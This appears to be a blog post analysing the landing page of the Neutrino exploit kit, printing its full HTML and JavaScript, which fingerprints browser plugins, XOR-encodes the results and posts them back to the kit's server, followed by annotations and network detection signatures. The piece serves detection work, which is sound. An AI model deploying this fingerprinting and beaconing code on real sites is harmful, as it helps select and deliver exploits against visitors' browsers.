I finally got the time to look into the landing pane of Neutrino. Thanks to @malwaresigs and @kafeine for providing samples :)
What is this shiny new EK up to when it comes to the landing. I have only seen clear text versions so no deobfuscation needed.
Look here for a deeper analysis of "Neutrin Exploit Kit Analysis"
1. The landing
<!DOCTYPE HTML>
<html>
<head>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js"></script>
<script type="text/javascript" src="scripts/js/plugin_detector.js"></script>
<script type="text/javascript">
$(document).ready(function() {
qweqwewqe('515245e3aaa2cbaa2a00002b');
});
function qweqwewqe(hid) {
var info = {
plugins : {
java: plg_all_vers('Java'),
adobe_reader: plg_ver('AdobeReader'),
flash: plg_ver('Flash'),
quick_time: plg_ver('QuickTime'),
real_player: plg_ver('RealPlayer'),
shockwave: plg_ver('Shockwave'),
silver_light: plg_ver('Silverlight'),
vlc: plg_ver('VLC'),
wmp: plg_ver('WMP')
}
}
var pass = rnd_str(1+Math.floor(Math.random()*10));
var obj = {};
obj["h"+rnd_str(1+Math.floor(Math.random()*10))] = hid; // host id
obj["p"+rnd_str(1+Math.floor(Math.random()*10))] = pass; // XOR pass
obj["i"+rnd_str(1+Math.floor(Math.random()*10))] = kor(JSON.stringify(info), pass);
$("body").load("c"+rnd_str(1+Math.floor(Math.random()*10)), obj);
}
function plg_all_vers(name) {
var info = PluginDetect.getInfo(name);
var vers = info.All_versions;
if(!vers)
return '';
return info.All_versions.join(';')
}
function plg_ver(name) {
var info = PluginDetect.getVersion(name);
return info;
}
function rnd_str(len) {
len++;
var result = [];
var chars = 'abcdefghijklmnopqrstuvwxyz0123456789';
while (--len) {
result.push(chars.charAt(Math.floor(Math.random() * chars.length)));
}
return result.join('');
}
function kor(input, pass) {
var output = "";
var i = 0;
var pos = 0;
for (i = 0; i < input.length; i++){
pos = Math.floor(i%pass.length);
output += String.fromCharCode(input.charCodeAt(i) ^ pass.charCodeAt(pos));
}
return output;
}
JSON.stringify = JSON.stringify || function (obj) {
var t = typeof (obj);
if (t != "object" || obj === null) {
// simple data type
if (t == "string") obj = '"'+obj+'"';
return String(obj);
}
else {
// recurse array or object
var n, v, json = [], arr = (obj && obj.constructor == Array);
for (n in obj) {
v = obj[n]; t = typeof(v);
if (t == "string") v = '"'+v+'"';
else if (t == "object" && v !== null) v = JSON.stringify(v);
json.push((arr ? "" : '"' + n + '":') + String(v));
}
return (arr ? "[" : "{") + String(json) + (arr ? "]" : "}");
}
};
</script>
</head>
<body>
</body>
</html>
The Javascript is calling the function qweqwewqe with som id(comment from the script syas host id), which we can see will be used to fetch JARs and the final payload. Link to @malwaresigs
Plugin detect is used to get the plugins from the client.
Variables are built:
//xor password generation:
var pass = rnd_str(1+Math.floor(Math.random()*10));
//@malforsec random string [a-z0-9]{1,10}
//host id assigned:
obj["h"+rnd_str(1+Math.floor(Math.random()*10))] = hid; // host id
//@malforsec h + [a-z0-9]{1,10} = 515245e3aaa2cbaa2a00002b
//xor password assigned:
obj["p"+rnd_str(1+Math.floor(Math.random()*10))] = pass; // XOR pass
//@malforsec p + [a-z0-9]{1,10} = [a-z0-9]{1,10}
//plugin results xored; tostring and assigned:
obj["i"+rnd_str(1+Math.floor(Math.random()*10))] = kor(JSON.stringify(info), pass);
// @malforsec i + [a-z0-9]{1,10} = XOR info with pass
//jquery to build the post:
$("body").load("c"+rnd_str(1+Math.floor(Math.random()*10)), obj);
//@malforsec c + [a-z0-9]{1,10}, obj
2. Debugger output
Browser plugin detection
Plugin detection string with XOR key and XORED PD string
Post request built
3. Wireshark output
POST request from captured with wireshark
4. Signatures
These patterns may vary or have changed - look here
POST request to /c[a-z0-9]{1,10}
Content-type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
h[a-z0-9]{1,10}=[a-f0-9]{24}
i[a-z0-9]{1,10}=.*
p[a-z0-9]{1,10}=[a-z0-9]{1,10}$
That should close it in pretty good :)
In addition we got som tip on how to get the different payloads out of the kit if we need to do that some day :)
Happy detecting Neutrino EK POST landing
No comments:
Post a Comment